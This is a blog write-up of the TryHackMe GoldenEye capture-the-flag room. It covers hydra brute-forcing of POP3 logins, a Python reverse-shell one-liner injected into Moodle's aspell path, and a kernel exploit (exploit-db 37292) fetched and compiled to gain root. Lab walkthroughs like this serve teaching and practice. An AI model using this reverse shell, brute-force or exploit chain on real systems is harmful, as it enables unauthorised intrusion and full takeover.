Search 🔎🖥️

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

By

Golden Eye

Room Link: https://tryhackme.com/r/room/goldeneye 

=====================================================

  • sudo nmap -p- -vv IP. You have 4 ports open 25,80,55006,55007.
  • When you visit the website and look into the source code you will find a script terminal.js. If you take a look at the script you will find interesting notes. 

 

We found a user boris and its encoded password. It is encoded with HTML escape and the decoded password is ********. Now use these credentials to login to /sev-home folder.

  • The service on port 25 is smtp, and on 55006, 55007 is pop3.

Some useful pop3 commands to know are:

USER > To provide a username

PASS > To provide a password

LIST > To list the emails for a user

RETR > To view the contents of an email

Now with nc try to connect to port 55007 with the credentials you have it won’t work.

So you will use hydra to get the password hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://IP:55007. And you will get the password *******.

  • Next, you need to know what services are configured on port 55007. It is telnet because we can connect to this port using telnet not ssh.

  • Now using boris credentials we will inspect the emails on port 55007. There is nothing that interesting with boris emails.

We can see in Boris’s emails that Natalya sent him an email, so we will search for Natalya’s password hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://IP:55007 which is ****. Now we will investigate her emails. In Natalya’s emails, we find an interesting discovery which is the credentials for a new account xenia:***********.

  • In some of the emails, there is a website mentioned called severnaya-nation.com. To be able to reach this website update you /etc/hosts file with the IP and the website name. This way you will be able to reach the website using your browser.

  • http://severnaya-station.com/gnocertdir using this URL you will be in the home screen of the Goldeneye operating training Moodle. After some trying you can log in as xenia. After login start looking into her page, you will find something interesting in her messages. From navigation bar > my profile > messages. There is a message from Doak.
  • To get Doak’s password we will use Hydra. password hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://IP:55007 which is ****. Using these credentials we can view Doak’s emails, from there we found his credentials to the severnaya website dr_doak:*********.
  • Login as dr_doak from navigation bar > my profile > my private files and then download the s3cret.txt file.

So we will do accordingly and go to IP/dir007key/for-007.jpg. Then, we will download the image and use exiftool to read its metadata.

In the Image Description we can see a value that looks a base64 encode. If we decoded it we will result in the admin’s password which is*********. Using this password we will login to http://severnaya-station.com/gnocertdir as admin.

  • Admin has more privileges, we will use them to gain a reverse shell. It gave us a hint about Aspell, so using search we will search for spell.

We will change the spell engine to PSpellShell and in the Path to aspell field we will inject our reverse shell code. Use https://www.revshells.com/ to generate you python’s reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.96.207",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Then prepare your device by creating a netcat listener nc -nlvp 9001. To toggle this shell, from navigation bar > my profile > blogs > add new entry. Then click the spell check button.

Through this you will get a reverse shell.

  • Get an interactive bash shell /bin/bash -i. Now we will start working to escalate our privileges. Using uname -a we knew that the kernel version is 3.13.0-32-generic, which is vulnerable to https://www.exploit-db.com/exploits/37292. Use searchsploit -m 37292 to copy the exploit into your current directory. Then python3 -m http.server to transfer the exploit into the victim’s machine.
  • From the victim’s machine cd /tmp then get http://VPNIP:8000/37292. Now that you have the exploit at the target machine you need to compile it to run it. To do this on a linux machine use gcc or cc which are compilers that are used to compile and run a C program on Linux operating system. The syntax is simple:
  • cc program-source-code.c -o executable-file-name.
  • gcc program-source-code.c -o executable-file-name.

in our case gcc 37292.c -o exploit. But the output shows that gcc is not installed. To see if cc is installed which cc and indeed it is. So we need to change every gcc in the code to cc, and we can do that by sed -i “s/gcc/cc/g” 37292.c. Now we can compile the exploit and get the executable cc 37292.c -o exploit. You might get some warnings but it is not important as long as the exploit file is created. Now you can run it ./exploit. This way you will immediately get root.

  • The flag is a hidden file in the root’s home directory✨.

Comments

Post a Comment

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

By
Image
بسم الله اللي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط: رابط التحدي:  https://tryhackme.com/r/room/blog ==================================================== كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap sudo nmap IP -vv طلع معانا 4 بورتات، نرجع نسوي Aggressive سكان عليها sudo nmap IP -vv -A -p 22,80,139,445 على بورت 22 عندنا SSH ونظام التشغيل لجهاز الضحية هو Ubuntu، وعلى بورت 80 عندنا Apache server، أما بورت 139 و 445 متعلقة بالـsmb. برضو أعطانا في النتائج إن الـhttp generator هو WordPress وبرضو أعطانا رقم النسخة وهو 5.0، وهذه معلومة مفيدة ومهمة.  إذا زرنا الصفحة على بورت 80 في المتصفح، بنلاقي بلوق للمستخدم Billy وفيها بوستات، ولكن ما بداخل هذه البوستات شيء مهم.  و زي ما قال لنا في التحدي، بنضيف الموقع إلى ملف etc/hosts/ على الجهاز الحين بنستفيد من الـsmb على جهاز الض...
Read more

eJPTv2 Exam Review (Arabic)

By
Image
 بسم الله الرحمن الرحيم اختبرت اختبار eJPTv2 والحمدلله حصلت على الشهادة. ← أول شيء، ايش تحتاجون من معرفة سابقة قبل ما تبدؤون الاختبار؟ تحتاجون معرفة بالشبكات ونظام لينكس ونظام ويندوز، في حالة ما كان عندكم معرفة فيها ما بيكفي الكورس اللي يجي مع الشهادة من وجهة نظري، كثير من المواضيع أو اللابات تفترض المعرفة السابقة بهالمواضيع. بالنسبة لويندوز ولينيكس مطلوب فهم التعامل مع النظام بال command line أهم شيء. أما الشبكات تحتاج تكونون فاهمينها كويس وطريقة عملها، لأن في الاختبار بينطلب pivoting وهو الانتقال لشبكة أخرى بواسطة جهاز وسيط تم اختراقه، هذه الخطوة تحتاج فهم جيد للشبكات. إذا كان معاكم معرفة بسيطة بهالمواضيع ممكن تبدؤون الكورس وخلال الدراسة لو في شيء جديد واجهكم تبحثون عنه، لكن إذا مافي معرفة سابقة أنصح بأخذ كورس لأي من النقاط اللي تحتاج منكم تطوير ثم البدء في الشهادة.   ← ثاني شيء، كم أحتاج مدة عشان أحصل على الشهادة ؟ هذه نقطة مهمة 😊 ، المدة تختلف كثييييير لكل شخص ويؤثر عليها هل هذا الشخص سبق وحل تحديات ctf لأنها تعطي مهارة وتسهل بشكل كبير فهم الكورس، برضو تخت...
Read more

TryHackMe|Blueprint WriteUp\Walkthrough (Arabic)

By
Image
بسم الله للي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط: رابط التحدي:   https://tryhackme.com/r/room/blueprint =========================================================== كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـ IP للمشين حقتكم على TryHackMe أول حاجة نشغل الـ machine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap sudo nmap IP -vv طلع معانا عدد كبير من البورتات، لكن بنترك البورتات اللي أرقامها كبيرة وبنركز على أول 7 بورتات، فنرجع نسوي Aggressive سكان عليها sudo nmap IP -vv -A -p 80,135,139,443,445,3306,8080 من خلال السكان عرفنا إن عندنا على بورت 8080 صفحة Index of  نروح نزور الصفحة ونشوف الملفات اللي بداخلها، إذا رحنا للمتصفح على http://IP:8080 بنلاقي مجلد oscommerce-2.3.4 إذا ضغطنا عليه بيودينا على صفحة فيها مجلدين، نضغط على catalog وبيفتح معانا موقع تجارة إلكترونية ولكن أبدا مو مرتب وتعبان جدا، هذا يعطي احتمال إن هذه النسخة من هذا الموقع قديمة وعل...
Read more